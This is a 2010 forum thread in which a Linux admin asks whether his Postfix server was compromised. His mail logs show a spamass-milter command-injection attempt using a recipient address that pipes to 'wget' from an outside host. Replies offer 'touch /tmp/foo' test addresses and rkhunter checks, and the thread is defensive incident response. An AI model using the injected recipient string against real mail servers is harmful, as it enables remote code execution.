Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > Linux Forums > Server Operation

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 20th April 2010, 17:39
bswinnerton bswinnerton is offline
Senior Member
 
Join Date: Jul 2007
Location: Connecticut, US
Posts: 502
Thanks: 51
Thanked 16 Times in 13 Posts
Default Think I may have been hacked..

Browsing through some of my logs today, I found that I have new mail which says the following:

Code:
R   7 blue@dick.com      Sun Apr 18 14:48  25/1227  blue@dick.com
And further:

Code:
Date: Sun, 18 Apr 2010 14:48:52 -0400 (EDT)
From: blue@dick.com
To: undisclosed-recipients:;
So I peered into my mail.log and found the following:

Code:
Apr 18 14:48:38 myserver postfix/qmgr[1802]: 1542F2056C: from=<blue@****.com>, size=203, nrcpt=1 (queue active)
Apr 18 14:48:38 myserver postfix/smtpd[12476]: disconnect from unknown[135.196.243.201]
Apr 18 14:48:52 myserver postfix/smtpd[12483]: connect from localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/smtpd[12483]: 510422064F: client=localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/cleanup[12480]: 510422064F: message-id=<20100418184852.510422064F@myserver.mysite.com>
Apr 18 14:48:52 myserver postfix/smtpd[12483]: disconnect from localhost[127.0.0.1]
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 510422064F: from=<blue@****.com>, size=1041, nrcpt=1 (queue active)
Apr 18 14:48:52 myserver amavis[4240]: (04240-16) Passed BAD-HEADER, [135.196.243.201] [135.196.243.201] <blue@****.com> -> <"root+:|wget http://fortunes.in/x1x.php"@myserver.mysite.com>, quarantine: X/badh-XQqZlXm4bqH6, mail_id: XQqZ$
Apr 18 14:48:52 myserver postfix/smtp[12481]: 1542F2056C: to=<root+:|wget http://fortunes.in/x1x.php@myserver.mysite.com>, orig_to=<root+:|wget http://fortunes.in/x1x.php>, relay=127.0.0.1[127.0.0.1]:10024, delay=15, delays=0.23/0.03/$
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 1542F2056C: removed   
Apr 18 14:48:52 myserver postfix/local[12487]: warning: 510422064F: address with illegal extension: root+:|wget http://fortunes.in/x1x.php
Apr 18 14:48:52 myserver postfix/local[12487]: 510422064F: to=<root+:|wget http://fortunes.in/x1x.php@myserver.mysite.com>, relay=local, delay=0.18, delays=0.08/0.06/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 510422064F: removed
Is it something I should be concerned with? How can I check to see if the hacker was successful?

Last edited by bswinnerton; 20th April 2010 at 17:50.
Reply With Quote
Sponsored Links
  #2  
Old 20th April 2010, 21:53
topdog topdog is offline
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts
Default

Someone is trying to exploit your system using the spamass-milter vulnerability.
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
Reply With Quote
  #3  
Old 20th April 2010, 22:04
bswinnerton bswinnerton is offline
Senior Member
 
Join Date: Jul 2007
Location: Connecticut, US
Posts: 502
Thanks: 51
Thanked 16 Times in 13 Posts
Default

Quote:
Originally Posted by topdog View Post
Someone is trying to exploit your system using the spamass-milter vulnerability.
And how can I check if they were successful?
Reply With Quote
  #4  
Old 21st April 2010, 09:34
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

Quote:
Apr 18 14:48:52 myserver postfix/local[12487]: 510422064F: to=<root+:|wget http://fortunes.in/x1x.php@myserver.mysite.com>, relay=local, delay=0.18, delays=0.08/0.06/0/0.04, dsn=2.0.0, status=sent (delivered to mailbox)
Apr 18 14:48:52 myserver postfix/qmgr[1802]: 510422064F: removed
I'd assume they have been sucessfull in any way, as at least postfix delivered the wget command to the mailbox.
So you might try to sarch for x1x.php on your filesystem if it is still there.

Another possibility would be to try rkhunter (rootkit.nl) to check what this tells you.

Do you have checks for fqdn_reciepient in your postfix's main.cf? As in my case the exploit did not work if this check is set up.
Reply With Quote
  #5  
Old 21st April 2010, 10:50
Ben Ben is offline
Moderator
 
Join Date: Jul 2006
Posts: 1,029
Thanks: 7
Thanked 62 Times in 56 Posts
Default

Ok the recipient thing does not really work, when escaping illegal chars with a \.
So I'd expect, if you are vulnerable to this attack, you should find a file "foo" in your /tmp folder if sending a mail to one of the following recipients via email:

Quote:
root+:|touch\ /tmp/foo\;@anyofyourdomains.com

OR

root+:|touch /tmp/foo@anyofyourdomains.com
Reply With Quote
  #6  
Old 21st April 2010, 14:46
bswinnerton bswinnerton is offline
Senior Member
 
Join Date: Jul 2007
Location: Connecticut, US
Posts: 502
Thanks: 51
Thanked 16 Times in 13 Posts
Default

Hmm, well I wasn't able to find any xlx.php, but that's not to say that the exploiter hasn't already removed it. Here's postconf -n

Code:
alias_database = hash:/etc/aliases
alias_maps = hash:/etc/aliases
append_dot_mydomain = no
biff = no
body_checks = regexp:/etc/postfix/body_checks
broken_sasl_auth_clients = yes
config_directory = /etc/postfix
content_filter = amavis:[127.0.0.1]:10024
header_checks = regexp:/etc/postfix/header_checks
html_directory = /usr/share/doc/postfix/html
inet_interfaces = all
mailbox_size_limit = 0
message_size_limit = 0
mime_header_checks = regexp:/etc/postfix/mime_header_checks
mydestination = myserver.mysite.com, localhost, localhost.localdomain
myhostname = myserver.mysite.com
mynetworks = 127.0.0.0/8 [::1]/128
myorigin = /etc/mailname
nested_header_checks = regexp:/etc/postfix/nested_header_checks
proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks $virtual_mailbox_limit_maps
readme_directory = /usr/share/doc/postfix
receive_override_options = no_address_mappings
recipient_delimiter = +
relay_domains = mysql:/etc/postfix/mysql-virtual_relaydomains.cf
relay_recipient_maps = mysql:/etc/postfix/mysql-virtual_relayrecipientmaps.cf
relayhost = 
smtp_tls_session_cache_database = btree:${data_directory}/smtp_scache
smtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)
smtpd_client_restrictions = check_client_access mysql:/etc/postfix/mysql-virtual_client.cf
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, check_recipient_access mysql:/etc/postfix/mysql-virtual_recipient.cf, reject_unauth_destination
smtpd_sasl_auth_enable = yes
smtpd_sasl_authenticated_header = yes
smtpd_sender_restrictions = check_sender_access mysql:/etc/postfix/mysql-virtual_sender.cf
smtpd_tls_cert_file = /etc/postfix/smtpd.cert
smtpd_tls_key_file = /etc/postfix/smtpd.key
smtpd_tls_security_level = may
smtpd_tls_session_cache_database = btree:${data_directory}/smtpd_scache
smtpd_use_tls = yes
transport_maps = proxy:mysql:/etc/postfix/mysql-virtual_transports.cf
virtual_alias_domains = 
virtual_alias_maps = proxy:mysql:/etc/postfix/mysql-virtual_forwardings.cf, mysql:/etc/postfix/mysql-virtual_email2email.cf
virtual_gid_maps = static:5000
virtual_mailbox_base = /var/vmail
virtual_mailbox_domains = proxy:mysql:/etc/postfix/mysql-virtual_domains.cf
virtual_mailbox_maps = proxy:mysql:/etc/postfix/mysql-virtual_mailboxes.cf
virtual_transport = maildrop
virtual_uid_maps = static:5000
And here is last night's rkhunter log:

Code:
Warning: The file properties have changed:
         File: /usr/bin/dpkg
         Current hash: 53d7c6c257b70f354bcf6d1cddd171180b24e8d0
         Stored hash : 53e46099fb111f5909e9a6a4be154f11f1743d4c
         Current inode: 19311    Stored inode: 613
         Current size: 391920    Stored size: 412400
         Current file modification time: 1268271142
         Stored file modification time : 1253435026
Warning: The file properties have changed:
         File: /usr/bin/dpkg-query
         Current hash: e3fa9c39564c1860bd7d86f7005a90ef8da821a2
         Stored hash : 1d9ca0bf53cdc2ab56850192c86ad17b863d58d9
         Current inode: 19314    Stored inode: 616
         Current size: 96172    Stored size: 104420
         Current file modification time: 1268271142
         Stored file modification time : 1253435026
Warning: The file properties have changed:
         File: /usr/bin/sudo
         Current hash: daa60130c30c5df58e10e6d280fd9dfcb5673ecf
         Stored hash : 8ac63a420a2fa2b359777f66a35e8c86d948108c
         Current inode: 5147    Stored inode: 8325
         Current file modification time: 1271179871
         Stored file modification time : 1267140126
Warning: The file properties have changed:
         File: /sbin/ifdown
         Current hash: 9b09364c44c8d6891c6e7bee14943b280bf10cc8
         Stored hash : 59b6b8df01abc4004a13dec4f174c7c3715dc6c7
         Current inode: 17690    Stored inode: 6038
         Current size: 34692    Stored size: 38844
         Current file modification time: 1266866128
         Stored file modification time : 1253661804
Warning: The file properties have changed:
         File: /sbin/ifup
         Current hash: 9b09364c44c8d6891c6e7bee14943b280bf10cc8
         Stored hash : 59b6b8df01abc4004a13dec4f174c7c3715dc6c7
         Current inode: 17690    Stored inode: 6038
         Current size: 34692    Stored size: 38844
         Current file modification time: 1266866128
         Stored file modification time : 1253661804
Warning: Application 'gpg', version '1.4.9', is out of date, and possibly a secu
rity risk.
Warning: Application 'openssl', version '0.9.8g', is out of date, and possibly a
 security risk.
Warning: Application 'php', version '5.2.10', is out of date, and possibly a sec
urity risk.
Warning: Application 'sshd', version '5.1p1', is out of date, and possibly a sec
urity risk.
Nothing really looks out of the ordinary. What do you think?
Reply With Quote
  #7  
Old 21st April 2010, 15:14
topdog topdog is offline
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts
Default

You do have a problem, dpkg and other binaries have been modified.
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
Reply With Quote
  #8  
Old 21st April 2010, 15:22
bswinnerton bswinnerton is offline
Senior Member
 
Join Date: Jul 2007
Location: Connecticut, US
Posts: 502
Thanks: 51
Thanked 16 Times in 13 Posts
Default

Perhaps, ifup ifdown was from an update that I did the other day. I just assumed that dpkg was also part of an update.

I've never used rkhunter before ISPConfig 3. I just thought that maybe it was a little "over" cautious. How can I tell if dpkg has been compromised?
Reply With Quote
  #9  
Old 21st April 2010, 15:24
topdog topdog is offline
Senior Member
 
Join Date: Jan 2008
Location: South Africa
Posts: 1,352
Thanks: 0
Thanked 153 Times in 150 Posts
Default

Download the same version and check the checksum's
__________________
----
http://www.topdog.za.net - Got Linux problems ? - I can help.
http://www.baruwa.org - Try it.
Reply With Quote
  #10  
Old 21st April 2010, 16:27
bswinnerton bswinnerton is offline
Senior Member
 
Join Date: Jul 2007
Location: Connecticut, US
Posts: 502
Thanks: 51
Thanked 16 Times in 13 Posts
 
Default

Quote:
Originally Posted by topdog View Post
Download the same version and check the checksum's
I'm sorry to be a pain. Never done this before. I'm trying to find the download on the internet, but it's just the .tar.gz to build dpkg, how would I actually verify the md5 of the compiled dpkg?
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
hELP WITH HACKED WEBSITE PLS spytron Server Operation 1 12th October 2009 16:29
My ISPConfig got hacked nsansari General 1 7th September 2009 13:01
Urgent need help my server is hacked !!!! zinovsky Server Operation 3 5th February 2009 17:23
Have I Been Hacked? :-o PierreQuebec Server Operation 11 8th April 2008 09:24
hacked by By BeLa & BodyguarD shajazzi HOWTO-Related Questions 2 25th April 2007 23:49


All times are GMT +2. The time now is 21:08.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.